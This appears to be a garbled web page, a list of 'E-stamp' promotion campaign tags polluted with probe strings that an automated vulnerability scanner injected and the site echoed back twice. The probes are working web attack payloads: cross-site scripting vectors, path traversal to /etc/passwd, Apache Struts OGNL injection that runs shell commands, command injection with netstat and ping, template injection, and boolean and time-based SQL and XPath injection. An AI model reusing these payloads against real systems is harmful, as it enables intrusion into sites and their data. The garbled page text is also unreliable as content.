Ads express_promotion express_estamp Express_E-stamp keymessage express_campigne howtogetestamp SXGP_E-stamp extrastamp_r8 E-Stamp_Promotion e-stamp_promtion stamp_promotion extra_stamp collection2 extra_stamp_launch_tvc15s extra_stamp_salehere " class="scroll-links">"> z--> " class="scroll-links">"'> [removed] " class="scroll-links">[removed]" SRC=//localhost/j> <[removed]qss=7;//<[removed]" class="scroll-links">"'><[removed]qss=7;//<[removed] <META HTTP-EQUIV="refresh" C> <STYLE type="text/css" a=3>BODY{background:url("[removed]qss=7")}</STYLE> <EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED> " class="scroll-links">"'> ' onEvent=X150750924Y4Z " onEvent=X150750924Y4Z < script a=4>qss=7< /script> [removed]_q(y)[removed] <script src=http://localhost/j qss{{q=(2*2.0)}}qss q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA q Qualys_resp_hdr_injection: Vulnerable q Qualys_resp_hdr_injection: Vulnerable ;-- # /* `` , ( 1e309 /../../../../../../../etc/passwd ../../../../../../../etc/passwd //..//..//..//..//..//..//..//etc/passwd //....//....//....//....//....//....//....//etc/passwd ../../../../../../../Windows/System32/drivers/etc/hosts %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new 
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} a(){}phpinfo(); function a |netstat -an http://rfitest/ ";(function(){qxss});// ");(function(){qxss});// ';(function(){qxss});// 9;(function(){qxss});// 9 ;(function(){qxss});// '-qxss()-' */;(function(){qxss});/* "-qxss()-" |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %> {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}} ;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */ (23.0231*213.759) aaaa&ping; -n 92 localhost& ping -c2 -i91 localhost |ping -c2 -i91 localhost |ping -c2 -i91 localhost| " class="scroll-links">"'> ' onEvent=X159895492Y4Z " onEvent=X159895492Y4Z " class="scroll-links">"'> ' onEvent=X152955000Y4Z " onEvent=X152955000Y4Z " class="scroll-links">"> " class="scroll-links">'"--!> " class="scroll-links">'"> round2 " class="scroll-links">"'> ' 
onEvent=X172006160Y4Z " onEvent=X172006160Y4Z was<!--esx-->esi" class="scroll-links">qualyswas<!--esx-->esi round3 round4 stam_promotion round5 phase2_extra_stamp extra_stamp_paepro_phase2 " class="scroll-links">collection2"'> [removed]_q=random(X144331948Y4Z)[removed] collection2 [removed]_q_q=random()[removed]
" class="scroll-links">collection2">
" class="scroll-links">"'> ' onEvent=X144331948Y4Z " onEvent=X144331948Y4Z collection2' [removed]qxss(X144331948Y4Z); <!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" --> collection2') or 2634=2634 -- collection2') and 2634=1123 -- collection2') /* or klpry */oR 2634=1511 + 1123 -- aND 1124 collection2' or 3789=3789 -- collection2' and 3789=1391 -- collection2' /* or klpry */oR 3789=2398 + 1391 -- aND 1390 collection2 or 4325=4325 -- collection2 and 4325=2728 -- collection2 /* or klpry */oR 4325=1597 + 2728 -- aND 2729 collection2 or NULL IS NULL collection2 or 6248 IS NULL collection2 oR 6248=2491 + 3757 collection2 and NULL IS NULL collection2 and 7248 IS NULL collection2 aND 7248=2491 + 4757 collection2') or 'swqtp'='swqtp collection2') and 'swqtp'='ptqws collection2') /* or klpry */oR ' aND ptqws'=' aND ptqws collection2' or 'tpklq'='tpklq collection2' and 'tpklq'='xqlkp collection2' /* or klpry */oR ' aND xqlkp'=' aND xqlkp collection21 or 11=11 collection21 or 11=12 collection25 oR 9=8 + 1 collection2' or true() or 'and' = 'and collection2' and false() and 'or' = 'and collection2' or not(false()) or 'true' = 'true collection2 or true() or 'and' = 'and' collection2 and false() and 'or' = 'and' collection2 or not(false()) or 'true' = 'true' collection2" or true() or "and" = "and collection2" and false() and "or" = "and collection2" or not(false()) or "true" = "true collection2WAITFOR DELAY '00:00:29' collection2;WAITFOR DELAY '00:00:29'; collection2);WAITFOR DELAY '00:00:29'-- collection2';WAITFOR DELAY '00:00:29'-- collection2');WAITFOR DELAY '00:00:29'-- collection2',0,0);WAITFOR DELAY'00:00:29'-- collection2 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) collection2' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ' collection2;SELECT sleep(29); -- collection2(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/ 
collection2(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)) stampx2_teaser extra_stamp_wongnaibeauty_phase2 [removed]_q=random(X157307652Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X157307652Y4Z " onEvent=X157307652Y4Z [removed]qxss(X157307652Y4Z); [removed]_q=random(X141291600Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X141291600Y4Z " onEvent=X141291600Y4Z [removed]qxss(X141291600Y4Z); logos [removed]_q=random(X170296576Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X170296576Y4Z " onEvent=X170296576Y4Z [removed]qxss(X170296576Y4Z); round6 [removed]alert(!)" class="scroll-links">">[removed]alert(!)
,z-->,"'>,[removed],[removed]" SRC=//localhost/j>,"'><[removed]qss=7;//<[removed],,<META HTTP-EQUIV="refresh" C>,<STYLE type="text/css" a=3>BODY{background:url("[removed]qss=7")}</STYLE>,<EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED>,"'>,' onEvent=X150750924Y4Z ," onEvent=X150750924Y4Z ,< script a=4>qss=7< /script>,[removed]_q(y)[removed],<script src=http://localhost/j ,qss{{q=(2*2.0)}}qss,q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA,q Qualys_resp_hdr_injection: Vulnerable,q Qualys_resp_hdr_injection: Vulnerable ,;-- ,#,/*,``,,,(,1e309,/../../../../../../../etc/passwd,../../../../../../../etc/passwd,//..//..//..//..//..//..//..//etc/passwd,//....//....//....//....//....//....//....//etc/passwd,../../../../../../../Windows/System32/drivers/etc/hosts,%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new 
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())},%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))},a(){}phpinfo(); function a,|netstat -an ,http://rfitest/,";(function(){qxss});//,");(function(){qxss});//,';(function(){qxss});//,9;(function(){qxss});//,9 ;(function(){qxss});//,'-qxss()-',*/;(function(){qxss});/*,"-qxss()-", |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>,{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}},;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */,(23.0231*213.759),aaaa&ping; -n 92 localhost&,ping -c2 -i91 localhost,|ping -c2 -i91 localhost,|ping -c2 -i91 localhost|,"'>,' onEvent=X159895492Y4Z ," onEvent=X159895492Y4Z ,"'>,' onEvent=X152955000Y4Z ," onEvent=X152955000Y4Z ,">,'"--!>,'">,round2,"'>,' onEvent=X172006160Y4Z ," onEvent=X172006160Y4Z 
,qualyswas<!--esx-->esi,round3,round4,stam_promotion,round5,phase2_extra_stamp,extra_stamp_paepro_phase2,collection2"'>,[removed]_q=random(X144331948Y4Z)[removed],collection2 [removed]_q_q=random()[removed],collection2">
,"'>,' onEvent=X144331948Y4Z ," onEvent=X144331948Y4Z ,collection2',[removed]qxss(X144331948Y4Z);,<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->,collection2') or 2634=2634 -- ,collection2') and 2634=1123 -- ,collection2') /* or klpry */oR 2634=1511 + 1123 -- aND 1124,collection2' or 3789=3789 -- ,collection2' and 3789=1391 -- ,collection2' /* or klpry */oR 3789=2398 + 1391 -- aND 1390,collection2 or 4325=4325 -- ,collection2 and 4325=2728 -- ,collection2 /* or klpry */oR 4325=1597 + 2728 -- aND 2729,collection2 or NULL IS NULL ,collection2 or 6248 IS NULL ,collection2 oR 6248=2491 + 3757 ,collection2 and NULL IS NULL ,collection2 and 7248 IS NULL ,collection2 aND 7248=2491 + 4757 ,collection2') or 'swqtp'='swqtp,collection2') and 'swqtp'='ptqws,collection2') /* or klpry */oR ' aND ptqws'=' aND ptqws,collection2' or 'tpklq'='tpklq,collection2' and 'tpklq'='xqlkp,collection2' /* or klpry */oR ' aND xqlkp'=' aND xqlkp,collection21 or 11=11,collection21 or 11=12,collection25 oR 9=8 + 1,collection2' or true() or 'and' = 'and,collection2' and false() and 'or' = 'and,collection2' or not(false()) or 'true' = 'true,collection2 or true() or 'and' = 'and' ,collection2 and false() and 'or' = 'and' ,collection2 or not(false()) or 'true' = 'true' ,collection2" or true() or "and" = "and,collection2" and false() and "or" = "and,collection2" or not(false()) or "true" = "true,collection2WAITFOR DELAY '00:00:29',collection2;WAITFOR DELAY '00:00:29';,collection2);WAITFOR DELAY '00:00:29'-- ,collection2';WAITFOR DELAY '00:00:29'-- ,collection2');WAITFOR DELAY '00:00:29'-- ,collection2',0,0);WAITFOR DELAY'00:00:29'-- ,collection2 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) ,collection2' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ',collection2;SELECT sleep(29); --,collection2(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- 
OR"*/,collection2(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)),stampx2_teaser,extra_stamp_wongnaibeauty_phase2,[removed]_q=random(X157307652Y4Z)[removed],"'>,' onEvent=X157307652Y4Z ," onEvent=X157307652Y4Z ,[removed]qxss(X157307652Y4Z);,[removed]_q=random(X141291600Y4Z)[removed],"'>,' onEvent=X141291600Y4Z ," onEvent=X141291600Y4Z ,[removed]qxss(X141291600Y4Z);,logos,[removed]_q=random(X170296576Y4Z)[removed],"'>,' onEvent=X170296576Y4Z ," onEvent=X170296576Y4Z ,[removed]qxss(X170296576Y4Z);,round6,">[removed]alert(!)">
